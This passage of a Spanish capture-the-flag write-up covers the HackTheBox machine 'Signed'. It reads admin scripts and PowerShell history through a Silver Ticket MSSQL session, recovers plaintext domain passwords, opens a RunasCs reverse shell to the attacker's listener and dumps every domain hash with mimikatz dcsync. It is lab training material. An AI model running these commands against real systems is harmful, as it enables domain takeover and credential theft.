# Silver Ticket "shell"
SQL (SIGNED\mssqlsvc  dbo@master)> SELECT * FROM OPENROWSET(BULK 'c:\Users\Administrator\Documents\cleanup.ps1', SINGLE_CLOB) AS c;
BulkColumn                                                                                                                                                                                                                                                        
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   
b'# DNS cleanup\r\n$ZoneName = "signed.htb"\r\n\r\n# List of default DNS records to keep (from your provided list)\r\n$defaultRecords = @(\r\n    @{Host="@"; Type="A"},\r\n    @{Host="@"; Type="AAAA"},\r\n    @{Host="@"; Type="NS"},\r\n    @{Host="@"; Type="SOA"},\r\n    @{Host="_gc._tcp"; Type="SRV"},\r\n    @{Host="_gc._tcp.Default-First-Site-Name._sites"; Type="SRV"},\r\n    @{Host="_kerberos._tcp"; Type="SRV"},\r\n    @{Host="_kerberos._tcp.Default-First-Site-Name._sites"; Type="SRV"},\r\n    @{Host="_kerberos._udp"; Type="SRV"},\r\n    @{Host="_kpasswd._tcp"; Type="SRV"},\r\n    @{Host="_kpasswd._udp"; Type="SRV"},\r\n    @{Host="_ldap._tcp"; Type="SRV"},\r\n    @{Host="_ldap._tcp.Default-First-Site-Name._sites"; Type="SRV"},\r\n    @{Host="_msdcs"; Type="NS"},\r\n    @{Host="dc01"; Type="A"},\r\n    @{Host="dc01"; Type="AAAA"},\r\n    @{Host="DomainDnsZones"; Type="A"},\r\n    @{Host="DomainDnsZones"; Type="AAAA"},\r\n    @{Host="_ldap._tcp.DomainDnsZones"; Type="SRV"},\r\n    @{Host="_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones"; Type="SRV"},\r\n    @{Host="ForestDnsZones"; Type="A"},\r\n    @{Host="ForestDnsZones"; Type="AAAA"},\r\n    @{Host="_ldap._tcp.ForestDnsZones"; Type="SRV"},\r\n    @{Host="_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones"; Type="SRV"}\r\n)\r\n\r\n# Get all records in zone\r\n$allRecords = Get-DnsServerResourceRecord -ZoneName $ZoneName\r\n\r\nforeach ($record in $allRecords) {\r\n\r\n    # Check if record is in defaults\r\n    $keep = $defaultRecords | Where-Object { $_.Host -eq $record.HostName -and $_.Type -eq $record.RecordType }\r\n    if ($keep) { continue } # Skip default records\r\n\r\n    try {\r\n        switch ($record.RecordType) {\r\n            "A" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "A" -Name $record.HostName -RecordData $record.RecordData.IPv4Address -Force\r\n                Write-Host "Removed A record: $($record.HostName)"\r\n            }\r\n            "AAAA" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "AAAA" -Name $record.HostName -RecordData $record.RecordData.IPv6Address -Force\r\n                Write-Host "Removed AAAA record: $($record.HostName)"\r\n            }\r\n            "CNAME" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "CNAME" -Name $record.HostName -RecordData $record.RecordData.HostNameAlias -Force\r\n                Write-Host "Removed CNAME record: $($record.HostName)"\r\n            }\r\n            "MX" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "MX" -Name $record.HostName -RecordData $record.RecordData.MailExchange -Force\r\n                Write-Host "Removed MX record: $($record.HostName)"\r\n            }\r\n            "TXT" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "TXT" -Name $record.HostName -RecordData $record.RecordData.DescriptiveText -Force\r\n                Write-Host "Removed TXT record: $($record.HostName)"\r\n            }\r\n            "SRV" {\r\n                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "SRV" -Name $record.HostName -RecordData $record.RecordData -Force\r\n                Write-Host "Removed SRV record: $($record.HostName)"\r\n            }\r\n            default {\r\n                Write-Host "Skipping unsupported record type: $($record.HostName) [$($record.RecordType)]"\r\n            }\r\n        }\r\n    } catch {\r\n        Write-Warning "Failed to remove $($record.HostName) [$($record.RecordType)]: $_"\r\n    }\r\n}\r\n\r\nWrite-Host "DNS cleanup completed."'   

SQL (SIGNED\mssqlsvc  dbo@master)> SELECT * FROM OPENROWSET(BULK 'c:\Users\Administrator\Documents\restart.ps1', SINGLE_CLOB) AS c;
BulkColumn                                                                                       
----------------------------------------------------------------------------------------------   
b'while ($true) {\r\n    Restart-Service -Name DNS -Force\r\n    Start-Sleep -Seconds 10\r\n}'   

SQL (SIGNED\mssqlsvc  dbo@master)>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81

#cleanup.ps1
# DNS cleanup
$ZoneName = "signed.htb"

# List of default DNS records to keep (from your provided list)
$defaultRecords = @(
    @{Host="@" ; Type="A"},
    @{Host="@" ; Type="AAAA"},
    @{Host="@" ; Type="NS"},
    @{Host="@" ; Type="SOA"},
    @{Host="_gc._tcp" ; Type="SRV"},
    @{Host="_gc._tcp.Default-First-Site-Name._sites" ; Type="SRV"},
    @{Host="_kerberos._tcp" ; Type="SRV"},
    @{Host="_kerberos._tcp.Default-First-Site-Name._sites" ; Type="SRV"},
    @{Host="_kerberos._udp" ; Type="SRV"},
    @{Host="_kpasswd._tcp" ; Type="SRV"},
    @{Host="_kpasswd._udp" ; Type="SRV"},
    @{Host="_ldap._tcp" ; Type="SRV"},
    @{Host="_ldap._tcp.Default-First-Site-Name._sites" ; Type="SRV"},
    @{Host="_msdcs" ; Type="NS"},
    @{Host="dc01" ; Type="A"},
    @{Host="dc01" ; Type="AAAA"},
    @{Host="DomainDnsZones" ; Type="A"},
    @{Host="DomainDnsZones" ; Type="AAAA"},
    @{Host="_ldap._tcp.DomainDnsZones" ; Type="SRV"},
    @{Host="_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones" ; Type="SRV"},
    @{Host="ForestDnsZones" ; Type="A"},
    @{Host="ForestDnsZones" ; Type="AAAA"},
    @{Host="_ldap._tcp.ForestDnsZones" ; Type="SRV"},
    @{Host="_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones" ; Type="SRV"}
)

# Get all records in zone
$allRecords = Get-DnsServerResourceRecord -ZoneName $ZoneName

foreach ($record in $allRecords) {

    # Check if record is in defaults
    $keep = $defaultRecords | Where-Object {
        $_.Host -eq $record.HostName -and $_.Type -eq $record.RecordType
    }

    if ($keep) { continue } # Skip default records

    try {
        switch ($record.RecordType) {
            "A" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "A" -Name $record.HostName -RecordData $record.RecordData.IPv4Address -Force
                Write-Host "Removed A record: $($record.HostName)"
            }
            "AAAA" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "AAAA" -Name $record.HostName -RecordData $record.RecordData.IPv6Address -Force
                Write-Host "Removed AAAA record: $($record.HostName)"
            }
            "CNAME" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "CNAME" -Name $record.HostName -RecordData $record.RecordData.HostNameAlias -Force
                Write-Host "Removed CNAME record: $($record.HostName)"
            }
            "MX" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "MX" -Name $record.HostName -RecordData $record.RecordData.MailExchange -Force
                Write-Host "Removed MX record: $($record.HostName)"
            }
            "TXT" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "TXT" -Name $record.HostName -RecordData $record.RecordData.DescriptiveText -Force
                Write-Host "Removed TXT record: $($record.HostName)"
            }
            "SRV" {
                Remove-DnsServerResourceRecord -ZoneName $ZoneName -RRType "SRV" -Name $record.HostName -RecordData $record.RecordData -Force
                Write-Host "Removed SRV record: $($record.HostName)"
            }
            default {
                Write-Host "Skipping unsupported record type: $($record.HostName) [$($record.RecordType)]"
            }
        }
    }
    catch {
        Write-Warning "Failed to remove $($record.HostName) [$($record.RecordType)]: $_"
    }
}

Write-Host "DNS cleanup completed."

1
2
3
4
5

# reset.ps1
while ($true) {
    Restart-Service -Name DNS -Force
    Start-Sleep -Seconds 10
}

History File

Encontramos tambien el historial de este usuario.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

# Silver Ticket + EXECUTE AS "shell"
SQL (SIGNED\Administrator  guest@master)> xp_dirtree C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Powershell/PSReadLine
[%] exec master.sys.xp_dirtree 'C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Powershell/PSReadLine',1,1
subdirectory              depth   file   
-----------------------   -----   ----   
ConsoleHost_history.txt       1      1   

SQL (SIGNED\Administrator  guest@master)>

# Silver Ticket "shell"
SQL (SIGNED\mssqlsvc  dbo@master)> SELECT * FROM OPENROWSET(BULK 'C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Powershell/PSReadLine/ConsoleHost_history.txt', SINGLE_CLOB) AS c;
BulkColumn                                                                                                                                                                                                                                                        
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   
b'# Domain`\n$Domain = "signed.htb"`\n`\n# Groups`\n$Groups = @("HR","IT","Finance","Developers","Support")`\n`\nforeach ($grp in $Groups) {`\n    if (-not (Get-ADGroup -Filter "Name -eq \'$grp\'" -ErrorAction SilentlyContinue)) {`\n        [... cut ...] updates.exe\r\niwr https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2025/05/windows10.0-kb5058392-x64_2881b28817b6e714e61b61a50de9f68605f02bd2.msu -O updates.exe\r\n.\\updates.exe.exe\r\n.\\updates.exe\r\nmove .\\updates.exe .\\updates.msu\r\n.\\updates.msu\r\ndel .\\updates.msu\r\n'   

SQL (SIGNED\mssqlsvc  dbo@master)>

Dentro del historial encontramos las credenciales de cada usuario en el dominio, incluyendo el del administrador.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

# [... cut ...]

# Users: Username, Password, Group
$Users = @(
    @{Username="oliver.mills";       Password="!Abc987321$"; Group="HR"},
    @{Username="emma.clark";         Password="!Xyz654789#"; Group="HR"},
    @{Username="liam.wright";        Password="!Qwe123789&"; Group="HR"},

    @{Username="noah.adams";         Password="!ItDev456$"; Group="IT"},
    @{Username="ava.morris";         Password="!ItDev789#"; Group="IT"},

    @{Username="sophia.turner";      Password="!Fin987654$"; Group="Finance"},
    @{Username="james.morgan";       Password="!Fin123987#"; Group="Finance"},
    @{Username="mia.cooper";         Password="!Fin456321&"; Group="Finance"},

    @{Username="elijah.brooks";      Password="!Dev123456$"; Group="Developers"},
    @{Username="isabella.evans";     Password="!Dev789654#"; Group="Developers"},
    @{Username="lucas.murphy";       Password="!Dev321987&"; Group="Developers"},
    @{Username="william.johnson";    Password="!ItDev321&"; Group="Developers"},

    @{Username="charlotte.price";    Password="!Sup123456$"; Group="Support"},
    @{Username="henry.bennett";      Password="!Sup654321#"; Group="Support"},
    @{Username="amelia.kelly";       Password="!Sup987123&"; Group="Support"},
    @{Username="jackson.gray";       Password="!Sup321654$"; Group="Support"},
    @{Username="harper.diaz";        Password="!Sup789321#"; Group="Support"}
)

# [... cut ...]

Get-NetConnectionProfile
Set-ADAccountPassword -Identity "Administrator" -NewPassword (ConvertTo-SecureString "Th1s889Rabb!t" -AsPlainText -Force) -Reset
Set-Service TermService -StartupType disabled
exit
# [... cut ...]

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113

# Domain
$Domain = "signed.htb"

# Groups
$Groups = @("HR", "IT", "Finance", "Developers", "Support")

foreach ($grp in $Groups) {
    if (-not (Get-ADGroup -Filter "Name -eq '$grp'" -ErrorAction SilentlyContinue)) {
        New-ADGroup -Name $grp -GroupScope Global -GroupCategory Security
    }
}

# Users: Username, Password, Group
$Users = @(
    @{ Username="oliver.mills";    Password="!Abc987321$"; Group="HR" },
    @{ Username="emma.clark";      Password="!Xyz654789#"; Group="HR" },
    @{ Username="liam.wright";     Password="!Qwe123789&"; Group="HR" },

    @{ Username="noah.adams";      Password="!ItDev456$"; Group="IT" },
    @{ Username="ava.morris";      Password="!ItDev789#"; Group="IT" },

    @{ Username="sophia.turner";   Password="!Fin987654$"; Group="Finance" },
    @{ Username="james.morgan";    Password="!Fin123987#"; Group="Finance" },
    @{ Username="mia.cooper";      Password="!Fin456321&"; Group="Finance" },

    @{ Username="elijah.brooks";   Password="!Dev123456$"; Group="Developers" },
    @{ Username="isabella.evans";  Password="!Dev789654#"; Group="Developers" },
    @{ Username="lucas.murphy";    Password="!Dev321987&"; Group="Developers" },
    @{ Username="william.johnson"; Password="!ItDev321&"; Group="Developers" },

    @{ Username="charlotte.price"; Password="!Sup123456$"; Group="Support" },
    @{ Username="henry.bennett";   Password="!Sup654321#"; Group="Support" },
    @{ Username="amelia.kelly";    Password="!Sup987123&"; Group="Support" },
    @{ Username="jackson.gray";    Password="!Sup321654$"; Group="Support" },
    @{ Username="harper.diaz";     Password="!Sup789321#"; Group="Support" }
)

foreach ($u in $Users) {
    if (-not (Get-ADUser -Filter "SamAccountName -eq '$($u.Username)'" -ErrorAction SilentlyContinue)) {
        New-ADUser `
            -Name $u.Username `
            -SamAccountName $u.Username `
            -UserPrincipalName "$($u.Username)@$Domain" `
            -AccountPassword (ConvertTo-SecureString $u.Password -AsPlainText -Force) `
            -Enabled $true `
            -PasswordNeverExpires $true

        Add-ADGroupMember -Identity $u.Group -Members $u.Username
    }
}

Invoke-WebRequest `
    -Uri "https://go.microsoft.com/fwlink/?linkid=2215202&clcid=0x409&culture=en-us&country=us" `
    -OutFile "C:\Windows\Tasks\SQL2022-SSEI-Expr.exe"

C:\Windows\Tasks\SQL2022-SSEI-Expr.exe

cd \
dir
cd .\SQL2022\
dir
cd .\Evaluation_ENU\
dir
.\SETUP.EXE /ACTION=Install

Get-Service -Name MSSQLSERVER
New-NetFirewallRule -DisplayName "SQL Server TCP 1433" -Direction Inbound -Protocol TCP -LocalPort 1433 -Action Allow -Profile Any
Set-Service MSSQLSERVER -StartupType Automatic
Start-Service MSSQLSERVER
Get-Service -Name MSSQLSERVER

whoami /all

secedit /export /cfg C:\Windows\Tasks\cur.inf
notepad C:\Windows\Tasks\cur.inf
secedit /configure /db C:\Windows\Security\local.sdb /cfg C:\Windows\Tasks\cur.inf /areas USER_RIGHTS

sc.exe privs MSSQLSERVER SeChangeNotifyPrivilege/SeCreateGlobalPrivilege/SeIncreaseWorkingSetPrivilege/SeIncreaseQuotaPrivilege
Restart-Service MSSQLSERVER

$zone = "DC=signed.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=signed,DC=htb"
$account = Get-ADUser mssqlsvc
$acl = Get-Acl "AD:$zone"
$identity = New-Object System.Security.Principal.NTAccount($account.SamAccountName)
$rights = [System.DirectoryServices.ActiveDirectoryRights]"GenericAll"
$inheritance = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($identity, $rights, "Allow", $inheritance)
$acl.AddAccessRule($ace)
Set-Acl -AclObject $acl "AD:$zone"

Enable-PSRemoting -Force

$FQDN = "dc01.signed.htb"
$cert = New-SelfSignedCertificate `
    -DnsName $FQDN `
    -CertStoreLocation Cert:\LocalMachine\My `
    -KeyExportPolicy Exportable `
    -FriendlyName "WinRM HTTPS $FQDN" `
    -NotAfter (Get-Date).AddYears(5)

$thumb = $cert.Thumbprint.Replace(" ", "")
winrm create winrm/config/Listener?Address=*+Transport=HTTPS `
    "@{Hostname=`"$FQDN`";CertificateThumbprint=`"$thumb`"}"

try { winrm delete winrm/config/Listener?Address=*+Transport=HTTP } catch {}

Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force
netsh advfirewall firewall add rule name="WinRM over HTTPS (5986)" dir=in action=allow protocol=TCP localport=5986
Restart-Service WinRM -Force

netstat -ano -p tcp
winrm enumerate winrm/config/listener
winrm get winrm/config

System Shell via RunasCs

Utilizamos la shell de mssqlsvc para ejecutar RunasCs con las credenciales de administrador, logrando ejcutar comandos como este usuario.

1
2
3
4

PS C:\users\mssqlsvc\Documents> ./RunasCs.exe Administrator Th1s889Rabb!t "cmd /c whoami"

signed\administrator
PS C:\users\mssqlsvc\Documents>

Ejecutamos una shell inversa.

1
2
3
4
5
6

PS C:\users\mssqlsvc\Documents> ./RunasCs.exe Administrator Th1s889Rabb!t powershell.exe -r 10.10.14.5:1337

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-55f77$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5988 created in background.
PS C:\users\mssqlsvc\Documents>

Finalmente logrando accesso como administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

❯ rlwrap nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.5] from signed.htb [10.10.11.90] 54470
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
signed\administrator
PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State   
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled 
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled 
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled 
SeCreateGlobalPrivilege                   Create global objects                                              Enabled 
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
PS C:\Windows\system32> cat C:/Users/Administrator/Desktop/root.txt
6e953c5b088e620c60433810bed4dbad
PS C:\Windows\system32>

Dump Hashes

Ejecutamos mimikatz para obtener los hashes de los usuarios del dominio, aunque ya teniamos las credenciales en texto plano.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

mimikatz # lsadump::dcsync /domain:signed.htb /all /csv
[DC] 'signed.htb' will be the domain
[DC] 'DC01.SIGNED.HTB' will be the DC server
[DC] Exporting domain 'signed.htb'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1109	oliver.mills	21d4dcaeb62cb577227094aa72dab5f3	66048
1110	emma.clark	0ba359ab587d350c644de9c3145d8668	66048
1111	liam.wright	6e46f64af0398d58eaa71c87fd54f6b2	66048
1112	noah.adams	d48af06d555bbae68c58efe47bcd2c0d	66048
1113	ava.morris	2c8313bbe020fb9e208fb6f933c3623f	66048
1114	sophia.turner	71a04f69295d7c7a4f36b864d0a01cad	66048
1115	james.morgan	0813fe8852c857e961ca1d65b20a95f9	66048
1116	mia.cooper	9cc5251ebf86225e53a9bcac8adf1842	66048
1117	elijah.brooks	89b1e2dc085e7a9e35d64aced32835e8	66048
1118	isabella.evans	c4874b2cc244102dbede7997fdfcc443	66048
1119	lucas.murphy	9e488a69fba0e675bde844c2359176c9	66048
1120	william.johnson	b5cdbf491a0a3fd27f7d78e57ecd3a01	66048
1121	charlotte.price	7b2351de0ebd879b285a391cd22da871	66048
1122	henry.bennett	f368d7adbfcdd0690f91304ea0d81b6d	66048
1123	amelia.kelly	3f817cb56c6985322d68e753d4931fde	66048
1124	jackson.gray	e55da171150de5fdbf3a69cda4c29944	66048
1125	harper.diaz	7cd44096ab804dcbf4da88b0becd86d8	66048
1103	mssqlsvc	ef699384c3285c54128a3ee1ddb1a0cc	66048
502	krbtgt	e66dab342f64c9a323012d62cd786de1	514
1000	DC01$	91d90e085c72770d23228f1b5dabaa23	532480
500	Administrator	62a34972744e3c2e078677e0c177c823	66048

mimikatz #
Share on
Dany Sucuc
WRITTEN BY
sckull

Read other posts

HackTheBox - Signed